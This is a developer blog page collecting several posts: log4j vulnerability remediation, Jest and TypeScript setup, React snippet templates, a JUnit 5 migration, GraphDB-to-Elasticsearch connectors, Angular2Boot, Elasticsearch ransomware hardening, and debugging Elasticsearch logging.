A new follow-on log4j vulnerability has been discovered and fixed in 2.16.0

Source: https://www.linkedin.com/posts/the-apache-software-foundation_apache-opensource-innovation-activity-6876303520321040384-csOP

A new follow-on #log4j vulnerability has been discovered and fixed in 2.16.0: (CVE-2021-44228 + CVE-2021-45046) following on from my first post regarding the initial exploit and fixed version 2.15.0

TL;DR: You now need to update your #log4j library to 2.16.0

As you would expect, both sides of the community are active. With that, the previous fixed version 2.15.0 and documented mitigations are still vulnerable in specific non-default configurations, such as using the Thread Context value in the log message Pattern Layout. There is a newer version from apache 2.16.0 that you should upgrade to mitigate this. This more recent version completely removes the message lookup feature, which is the critical enabler of this exploit!

Finally, there is tons of information around the recent #log4j exploits, and some are misleading. Perhaps take your cue from an application security company’s blog post like lunasec

Giving this is an evolving situation still I would not post the latest fixes here instead, please see the official Apache security page for an always up to date fix

Example misleading fixes that would not save you from this log4j exploit 🙂 :
– Updating #Java
– #WAF (Web Application Firewall) filtering
– Simply modifying the log statement format to %m{nolookupzz}

Log4J zero-day exploit explained and proposed fixes – a Critical Security Vulnerability (CVE-2021-44228)


There is a new zero-day exploit of the famous log4j library reported and fixed in the latest version, 2.15.0.  In brief, this vulnerability is critical and can give the offender complete server control. For more, please see the Apache Log4j security page.   Everyone in the Java-sphere should be aware of it. Actually, no! Every engineer and information security personnel should take action (looking over to my .net and Javascript buddies who are giggling at another Java security issue and then realising by the end of this post that their Elasticsearch and Atlassian apps are affected). This post will attempt to explain the log4j security exploit, help you determine if you are compromised, how to fix the exploit, and crucially, how to ascertain that you have resolved the log4j security exploit.

The best evidence I have seen so far is that of a little bobby table LinkedIn exploit.

Quick specifics about the log4j-core

  • Log4J: The CVE-2021-44228 vulnerability affects only the log4j-core library.
  • Springboot: The bundle libraries log4j-to-slf4j and log4j-api in spring-boot-starter-logging are not affected according to Spring. Unless of cause you have swapped them out to directly use log4j-core or another logging library that transitively brings it in scope.
  • So far reports seems to suggest applications are only affected when user inputs are logged.
  • PS: Springboot says, v2.5.8 & v2.6.2 releases (due Dec 23, 2021) will contain the fixed Log4J version v2.15.0.

Although the affected versions are anything between 2.0-beta9 and 2.14.1, any beta versions of 2.15.* would be affected.  The most secure/”permanent” fix is to update your log4j library to 2.15.0 immediately.  Please see Maven Central and log4j security announcements or carry on reading. 

Am I affected?

Anyone running Java is affected.  With the assumption that you would have something at least in your application’s transitive dependencies that bring in log4j if you are not using it directly.  Best to assume you have it and act accordingly.  In practice, any java application that takes in a user input that may end up in a log is affected given that log4j is ubiquitous in the java community! 

How to tell which version of Log4J library I have

You can use your dependencies managers like Maven or Gradle to print out all your dependencies and their versions to verify what version of Log4J you have.

For example, for Gradle:

# execute, logging out only the log4j dependency lines
./gradlew dependencies | grep “log4j”

Also, note you can right-click on your pom.xml or build.gradle file in popular IDEs like IntelliJ then chose to “generate visual dependency graph” / “effective dependency”

How to fix the log4J zero-day secuirty exploit

Example fix of the Log4j zero day exploit for Maven

# Override the log4j dependency of a Springboot project

# And then verify the override works
./mvnw dependency:list | grep log4j

Example fix of the log4j zero day exploit for Gradle

# Via gradle's platform support add

# or for those with Springboot simply set the log4j's version
ext['log4j2.version'] = '2.15.0'

# And then verify the override works
./gradlew dependencyInsight --dependency log4j-core

Where upgrading the dependency is not possible

A workaround exists for some versions, such as releases >=2.10, by setting either the system property log4j2.formatMsgNoLookups or any of the following:

# In the JVM.Options file, add this:
# or set the environment variable:  LOG4J_FORMAT_MSG_NO_LOOKUPS=true
# or simply run the application with (you may need to add quotes, depending on your shell . i.e "true")
java -Dlog4j2.formatMsgNoLookups=true -jar myapplication.jar

Popular applications affected by the log4J critical vulnerability

If you think you are not affected, have a look at this flavour of applications that would be affected:

  • Libraries:
    • Spring Boot
    • Struts
  • Apps
    • Solr
    • ElasticSearch
    • Kafka
    • Logstash
    • Jira
    • Confluence
    • Stash
    • Bamboo
    • Crowd
    • Fisheye
    • Crucible 
  • Server:
    • Steam
    • Apple iCloud
    • Minecraft

Yes, that’s almost any good Java application out there…

As a final reminder, this vulnerability is classed as critical by Apache.  Apache describes a Critical vulnerability as one “which a remote attacker could potentially exploit to get Log4j to execute arbitrary code (either as the user the server is running as or root). These are the sorts of vulnerabilities that could be exploited automatically by worms”.  Here are additional resources for you on the recent Log4J security vulnerability:

How to configure JEST to test a Typescript React or NodeJS

Jest integration with Intellij Idea

This is an opinionated guide that would illustrate how to configure Jest for testing NodeJS/React projects written in Typescript. It assumes Typescript is already installed. For new projects or projects without Typescript, needless, to say this guide can still be used upon completing the initial project setup to add React and or Typescript. There is a lot of guides out there already for adding Typescript to your project already.

1. Install Jest and friends

yarn add --dev jest ts-jest @types/jest
# or
npm i -D jest ts-jest @types/jest

  1. ts-jest is a TypeScript preprocessor for jest – it lets you use jest to test projects written in TypeScript.
  2. @types/jest types, because jest is written in JavaScript

2. Configure the preprocessor for Jest

Configure JEST to use ts-jest as the preprocessor. By using ts-jest to auto create a configuration file named jest.config.js with then jest preprocessor configs:

npx ts-jest config:init

Initial default generated output:

module.exports = {
    preset: 'ts-jest',
    testEnvironment: 'node',

3. A complete opinionated configuration for Jest

My full customisations, settings self descriptive:

module.exports = {
  roots: ["<rootDir>/src"],
  preset: "ts-jest",
  testEnvironment: "node",
  coverageDirectory: "coverage",
  testPathIgnorePatterns: ["/node_modules"],
  verbose: true,
  // collectCoverage: true, <--Not needed because this would be applied/not by scripts in the package.json below
  coverageThreshold: {
    global: {
      branches: 90,
      functions: 95,
      lines: 95,
      statements: 90,
  collectCoverageFrom: ["**/*.{ts,tsx,js,jsx}", "!**/node_modules/**", "!**/vendor/**"],

  coveragePathIgnorePatterns: ["/node_modules"],
  coverageReporters: ["json", "lcov", "text", "clover"],

Note collectCoverage: true must be true or passed as a flag e.g. jest --coverage for coverage to be collected regardless of the content of the other coverage related settings.

For more on configuring jest see the official configuring Jest here

4. Configure the test scripts your package.json:

    "scripts": {
        "test": "jest"

Or with advance/opinionated customisations. Self-explanatory naming:

    "scripts": {
        "test": "jest --coverage",
        "test:watch": "jest --coverage --watchAll",
        "test:nocoverage": "jest",
        "test:watch:nocoverage": "jest --watchAll"

Congratulations if you got this far. This is a one off set-up, you would rip the benefits in days to come. Follow-on below to rest your Jest configuration for testing your Typescript React or NodeJs project.

5. Test it

To verify all is well

  1. Write a simple class, and a test for it see the JEST examples.
// sum.ts
const sum = (a: number, b: number) => {
  return a * b; // currently red, fixme: to go green (TDD).
export default sum;

// sum.test.ts
import sum from "./sum";

describe("test add function", () => {
  test("adds 1 + 2 to equal 3", () => {
    expect(sum(1, 2)).toBe(3); // should fail, fix function under test above.

Then run the tests with the following, note the commands are from the script configured above

  1. yarn test to run the tests with coverage
  2. yarn test:watch to continuously run the tests. Highly recommended particular when doing TDD (Test Driven Development)
  3. yarn test:watch:nocoverage to continuously run the tests with no coverage, faster feedback.
  4. yarn view:coverage hosts the reports as a static website, note serve needs to be globally installed: yarn global add serve

Example out put when I run yarn test:

yarn test Example console output with failing test.
yarn test example console output with failing test.

Go on fix the test, you know you want to if you have not already done so. Here is what the output should look like once all your test(s) are passing:

yarn test Example console output with passing test.
yarn test example console output with passing test.

Thank you! Enjoy!


React Code Snippet Generators with IntelliJ Idea

I am a big fan of anything than can be automated, especially when it comes to boiler plate plumbing.  Even more so for a Java developer like myself taking up React.  The following snippets have saved me lots of typos and errors, I will suspect it will for you too!

How to generator snippets in IntelliJ Idea

Before we go any further here is how to generate code snippet in IntelliJ Idea

  •  Simply type abbreviation name of the required snippet in the editor in the target file and press 

  • You can further narow the list suggestions by IntelliJ Idea by typing more characters of your abbrevation.


  • Component name would be taken from the file name “ManageCoursePage.js”
  • For those on Visual Studio Code IDE the Code generation for React can be achieved with the Typescript React Code Snippet Extention

I will pick a few from the above screenshot to illustrate what code is generated.

Creates a React component class with PropTypes and ES6 module system

  1. Type ​`​rccp` in your editor
  2. Then press ⇥ to generate

Generated Snippet

Note Component name would be taken from the file name “ManageCoursePage.js”

import React, {Component} from 'react';
import PropTypes from 'prop-types';

class ManageCoursePage extends Component {
  render() {
    return (

ManageCoursePage.propTypes = {};

export default ManageCoursePage;

Creates a React component class with ES6 module system

  1. Type ​`​rcc` in your editor
  2. Then press ⇥ to generate

Generated Snippet

import React, {Component} from 'react';

class ManageCoursePage extends Component {
 render() {
 return (

export default ManageCoursePage;

Creates a React component class connected to redux with dispatch

  1. Type ​`​rrdc` in your editor
  2. Then press ⇥ to generate

Generated Snippet

import React, {Component} from 'react';
import {connect} from 'react-redux';

function mapStateToProps(state) {
  return {};

function mapDispatchToProps(dispatch) {
  return {};

class ManageCoursePage extends Component {
  render() {
    return (

export default connect(

Creates a React component class with PropTypes and all lifecycle methods and ES6 module system

  1. Type ​`​rcfc` in your editor
  2. Then press ⇥ to generate

Generated Snippet

import React, {Component} from 'react';
import PropTypes from 'prop-types';

class ManageCoursePage extends Component {
  constructor(props) {


  componentWillMount() {


  componentDidMount() {


  componentWillReceiveProps(nextProps) {


  shouldComponentUpdate(nextProps, nextState) {


  componentWillUpdate(nextProps, nextState) {


  componentDidUpdate(prevProps, prevState) {


  componentWillUnmount() {


  render() {
    return (

ManageCoursePage.propTypes = {};

export default ManageCoursePage;


I hope you found the above helpful in saving you time and potentially reducing typos/errors and your chances of RSI.  And of cause these are live code snippets and can be managed like other snippets for Java and other languages via Intellij Idea’s preferences under “Live Templates”.


Upgrading from a Spring boot application with JUnit 4 to JUnit 5, Jupiter

I realised this is only doable with spring 5

To migrate from JUnit 4 to JUnit 5 you can replace @RunWith(SpringRunner.class) with @ExtendWith(SpringExtension.class).

Unfortunately, spring-boot version 1.5.9-RELEASE is based on Spring 4 and the SpringExtension is only available since Spring 5.

Source: https://stackoverflow.com/questions/48019430/junit5-with-spring-boot-1-5

and  http://www.baeldung.com/junit-5-runwith


Current dependency:

Exclude the transitive Junit 4 dependency from the Spring boot test dependency






This will break all your imports with of junit in your test classes. And your vigilant IDE should be compalining already about these.

import org.junit.Test;
import org.junit.runner.RunWith;

Down also goes your tags:


You should now be able to use your IDE assist features to generate add teh depency to your pom like show in the following image for intellij.  Or simple copy the depency from the pom snippet below.



Snippet here of dependecny


Make things easy and do a global find/replace:

import org.junit.Test; ->  import org.junit.jupiter.api.Test;

import org.junit.runner.RunWith; –> import org.junit.jupiter.api.extension.ExtendWith;

import org.springframework.test.context.junit4.SpringRunner; –>

@RunWith(SpringRunner.class) –> @ExtendWith(SpringExtension.class)






Graph DB Connectors – elasticsearch example

Semantic Search gets the power of Full Text Search



  1. An installed instance of GraphDB (currently only the OntoText Enterprise edition has connectors)
  2. An installed instance of Elasticsearch
    1. With port 9300 open and running (this can be configured in */config/elasticsearch.yml or through your puppet/chef)
    2. If you are running this on Vagrant ensure all ports are forwarded to your host [9200, 9300, 12055 etc]


Prepare GraphDB

  1. Setup GraphDB location

Setup Repository and switch it on to default

GrapghDB Locations And Repo

Create Elasticsearch Connector

  1. Go to the SPARQL tab
  2. Insert your query like bellow and hit run


PREFIX : &amp;lt;http://www.ontotext.com/connectors/elasticsearch#&amp;gt;
PREFIX inst: &amp;lt;http://www.ontotext.com/connectors/elasticsearch/instance#&amp;gt;

INSERT DATA {inst:my_index :createConnector '''
  "elasticsearchCluster": "vagrant",
  "elasticsearchNode": "localhost:9300",
  "types": ["http://www.ontotext.com/example/wine#Wine"],
  "fields": [
    {"fieldName": "grape",
      "propertyChain": [
    {"fieldName": "sugar",
      "propertyChain": [
      ],"orderBy": true},
    {"fieldName": "year",
      "propertyChain": [
''' .

3.  Go over to Elasticsearch and confirm that you have a newly created index [my_index], this will be empty for now

4.  Example debugging to do is check for the listed Connectors and its status:

PREFIX : &amp;lt;http://www.ontotext.com/connectors/elasticsearch#&amp;gt;

SELECT ?cntUri ?cntStr {
  ?cntUri :listConnectors ?cntStr .

PREFIX : &amp;lt;http://www.ontotext.com/connectors/elasticsearch#&amp;gt;

SELECT ?cntUri ?cntStatus {
  ?cntUri :connectorStatus ?cntStatus .


Insert Data in GraphDB


  1. The Connector should listen in for any data changes and insert/update/sync the accompanying elastic copy.


@prefix rdf: &lt;http://www.w3.org/1999/02/22-rdf-syntax-ns#&gt; .
@prefix rdfs: &lt;http://www.w3.org/2000/01/rdf-schema#&gt; .
@prefix xsd: &lt;http://www.w3.org/2001/XMLSchema#&gt; .
@prefix : &lt;http://www.ontotext.com/example/wine#&gt; .

:RedWine rdfs:subClassOf :Wine .
:WhiteWine rdfs:subClassOf :Wine .
:RoseWine rdfs:subClassOf :Wine .

    rdf:type :Grape ;
    rdfs:label "Merlo" .

    rdf:type :Grape ;
    rdfs:label "Cabernet Sauvignon" .

    rdf:type :Grape ;
    rdfs:label "Cabernet Franc" .

    rdf:type :Grape ;
    rdfs:label "Pinot Noir" .

    rdf:type :Grape ;
    rdfs:label "Chardonnay" .

    rdf:type :RedWine ;
    :madeFromGrape :CabernetSauvignon ;
    :hasSugar "dry" ;
    :hasYear "2013"^^xsd:integer .

    rdf:type :RedWine ;
    :madeFromGrape :Merlo ;
    :madeFromGrape :CabernetFranc ;
    :hasSugar "dry" ;
    :hasYear "2012"^^xsd:integer .

    rdf:type :RedWine ;
    :madeFromGrape :PinotNoir ;
    :hasSugar "medium" ;
    :hasYear "2012"^^xsd:integer .

    rdf:type :WhiteWine ;
    :madeFromGrape :Chardonnay ;
    :hasSugar "dry" ;
    :hasYear "2012"^^xsd:integer .

    rdf:type :RoseWine ;
    :madeFromGrape :PinotNoir ;
    :hasSugar "medium" ;
    :hasYear "2013"^^xsd:integer .



















TypeScript is great but I just want to write my Angular2 app in Java8

angular2boot intellij Idea

angular2boot intellij Idea
angular2boot intellij Idea


It is really hard to look at any other alternative to TypeScript for Angular2 development. Not only is it easy to learn it is also far less error prone compared to developing in JS as you get static type checking for classes, interfaces and so on.

Sometimes you just want to write Angular2 app in java8 and hopefull java9 soon.  This is particularly a non-brainer if it’s only a small application where in splitting the app into multiple component/tiers (WebClient, Service & Backend REST-API) is not really worth the overhead.

I just want to write my Angular2 app in Java8

Enters Angular2Boot

  • Write angular2 app in java8
  • Framework built on top of Angular 2, GWT and Spring Boot
    • Gwt used to compile to JS
    • You are free to mix GWT and Angular, but why if not to deal with legacy only.


  1. TypeScript is good but here you get an even stronger typed OO language in Java
  2. Numerous tried and tested tooling and IDEs aroung for java.
  3. And for when you need one single jar, nothing better than one uber springboot jar! Not to mention the simplicity and ease of Springboot, especially when building POCs
  4. And lets face it, java is the language of choice for building robust applications


Give it a try (5minute)


Create Project

Generate Angular and Gwt App from archetype template

mvn archetype:generate \

 -DarchetypeGroupId=fr.lteconsulting \

 -DarchetypeArtifactId=angular2-gwt.archetype \

  • This will then do the scanning and downloading of dependences etc. You’ll then be prompted to feed in a few more details:
# Define value for property 'groupId': com.mosesmansaray.play
# Define value for property 'artifactId': angular-gwt-in-java8-example
# Define value for property 'version' 1.0-SNAPSHOT: :
# Define value for property 'package' com.mosesmansaray.play: :
  • Then confirm properties configuration to complete


To install/produces and executable fat jar

mvn clean install

  • The above will complete the download of further dependences needed to compile the application.
  • It should then be ready in your application target folder e.g.



To run the fat jar

java -jar target/angular-gwt-in-java8-example-1.0-SNAPSHOT.jar


Developing/Live reload

  • Backend mvn spring-boot:run
  • Frontend mvn gwt:run-codeserver


  1. Documentation and More From Here at lteconsulting.fr
  2. Libary SourceCode
  3. Or checkout Arnaud Tournier’s talk at GWT con 2016 bellow:
    1. Youtube quick run through
    2. Speaker Decks
  4. Angular2boot Tour of Heroes Tutorial
  5. Demos on github
  6. The angular2-gwt.archetype

Elasticsearch Ransomware

Elasticsearch logo


  1. Use X-Pack if you can,
  2. Do not expose your cluster to the internet,
  3. Do not use default configurations e.g. ports,
  4. Disable http if possible,
  5. If it must be internet facing: run behind a firewall, reverse proxy – Nginx (see example config), VPN etc,
  6. Disable Scripts,
  7. Regular back-up of your data with curator if you are not already.

Well, we all see that coming, didn’t we?  Once MongoDB started being ransom by criminals other No-SQL type technologies are surely on queue to follow. Now Elasticsearch Ransomware, no surprise neither that most Elasticsearch clusters are open to the internet.  Goes without saying even secure ones are mostly behind week/guessable passwords, default ports with unneeded http enabled.

The attackers are currently empting out clusters with a note left behind for payment:

 “Send 0.2 BTC (bitcoin)to this wallet xxxxxxxxxxxxxx234235xxxxxx343xxxx  if you want recover your database! Send to this email your service IP after sending the bitcoins xxxxxxx@xxxxxxx.org”

Rest assured if your are using elastic cloud you will be protected by their default shield/x-Pack protection.  To protect your self hosted cluster, the team at Elastic have posted a guide here.  Such a guide really should not be news to any Elasticsearch admin! If it is then action is nigh!

There is also a detailed step by step guide on all things securing your Elasticsearch cluster: “Don’t be ransacked: Securing your Elasticsearch cluster properly” by Itamar Syn-Hershko

So far its been mostly Amazon exposed services.  But the same Elasticsearch Ransomware techniques against an unsecure (wrongly configured) Elasticsearch instance can be applied to any other hosted/self Elasticsearch service.

Cleaning Elasticsearch Data being indexed

Sometimes we just don’t have control over the source of data coming into our elasticsearch indices.  In such cases cleaning Elasticsearch data and removing unwanted data such as html tags before they are put into your elasticsearch index.  This is to prevent unwanted and unpredictable behaviour.

For instance given the text bellow:

<a href=\"http://somedomain.com>\">website</a>


If the above is indexed without clean the html, a search for “somedomain” will match documents with the above link.  It might be what you want, but in most cases users do not.  So to prevent this you can use a custom analyser to clean your data.
Bellow is an example solution with cool techniques to debug and analyse your analyser such as query the actual data that is in your index. Note not the Elasticsearch document _source field which will always hold the true 100% raw data that hits elasticsearch unmodified.

Cleaning Elasticsearch Data


Create a new

Index with the required html_strip mapping filter configured

PUT /html_poc_v3
  "settings": {
    "analysis": {
      "analyzer": {
        "my_html_analyzer": {
          "type": "custom",
          "tokenizer": "standard",
          "char_filter": [
  "mappings": {
    "html_poc_type": {
      "properties": {
        "body": {
          "type": "string",
          "analyzer": "my_html_analyzer"
        "description": {
          "type": "string",
          "analyzer": "standard"
        "title": {
          "type": "string",
          "index_analyzer": "my_html_analyzer"
        "urlTitle": {
          "type": "string"



Post Some Data

POST /html_poc_v3/html_poc_type/02
  "description": "Description &lt;p&gt;Some d&amp;eacute;j&amp;agrave; vu &lt;a href=\"http://somedomain.com&gt;\"&gt;website&lt;/a&gt;",
  "title": "Title &lt;p&gt;Some d&amp;eacute;j&amp;agrave; vu &lt;a href=\"http://somedomain.com&gt;\"&gt;website&lt;/a&gt;",
  "body": "Body &lt;p&gt;Some d&amp;eacute;j&amp;agrave; vu &lt;a href=\"http://somedomain.com&gt;\"&gt;website&lt;/a&gt;"

Now retrieve indexed data

This will by-pass the _source field and fetch the actual indexed data/tokens

GET /html_poc_v3/html_poc_type/_search?pretty=true
  "query": {
    "match_all": {}
  "script_fields": {
    "title": {
      "script": "doc[field].values",
      "params": {
        "field": "title"
    "description": {
      "script": "doc[field].values",
      "params": {
        "field": "description"
    "body": {
      "script": "doc[field].values",
      "params": {
        "field": "body"

 Example Response

 Note: the difference for title, description and body

  "took": 2,
   "timed_out": false,
   "_shards": {
      "total": 5,
      "successful": 5,
      "failed": 0
   "hits": {
      "total": 1,
      "max_score": 1,
      "hits": [
            "_index": "html_poc_v3",
            "_type": "html_poc_type",
            "_id": "02",
            "_score": 1,
            "fields": {
               "title": [
               "body": [
               "description": [

Further Cleaning Elasticsearch Data References:

Use this tool to test you analyser : elasticsearch-inquisitor


Missing logs in Elasticsearch logs at midnight

Case: of the Missing logs

I was debugging a curious case of my Elasticsearch instance on my vagrant dev box going to RED state every night at 00:00:00.  Consistently as far back as I can remember.

Right the obvious thing to do is look at the logs right? Except for this set of rotated logs there are no lines between 23:40hrs to 00:00:05.  Not in the current un-rotated log or the previous set.

At First Pass:

  1. Elasticsearch rotates its own log.  Could it be this process causing the missing Elasticsearch log lines?
  2. Marvel Creates new daily indices at 00:00:00.  Could it be this causing the missing Elasticsearch log lines?

What was the real was causing the missing logs

Well By default Elasticsearch uses log4j.  However, instead of the standard log4j.property file you get with log4j Elasticsearch is using a translated format to YAML format excluding all of the log4j pre-fix giveaways.  Another closer look at the configuration lead to the curious investigation of the type of rolling appender ; DailyRollingFile. This lead to this revelation :

DailyRollingFileAppender extends FileAppender so that the underlying file is rolled over at a user chosen frequency. DailyRollingFileAppender has been observed to exhibit synchronization issues and data loss. The log4j extras companion includes alternatives which should be considered for new deployments and which are discussed in the documentation for org.apache.log4j.rolling.RollingFileAppender.

Source :  Apache’s DailyRollingFileAppender Documentation

Missing Elastic logs Root Cause:

The sync issue with the DailyRollingFileAppender must be the cause to the missing Elasticsearch log lines around midnight.

Missing Elastic logs fix:

Use a log4j alternatives to DailyRollingFileAppender.  In this case a RollingFileAppender, changing my rolling strategy to roll my logs when they reach a certain file size. Replace DailyRollingFileAppender with RollingFileAppender and removing the  datePattern which was for the DailyRollingFileAppender.


    type: rollingFile
    file: ${path.logs}/${cluster.name}.log
    maxFileSize: 10000000
    maxBackupIndex: 10
        type: pattern
        conversionPattern: "[%d{ISO8601}][%-5p][%-25c] %m%n"

Note: YAML is particular about tabs!

Happy Ending

Marvel turns out to be the cause of the my Elasticsearch cluster going into RED state at mid-night on new .Marvel*** Index creation.  Which makes sense as there will be a few milliseconds-seconds when this new index will have been created with shards, replicas etc missing.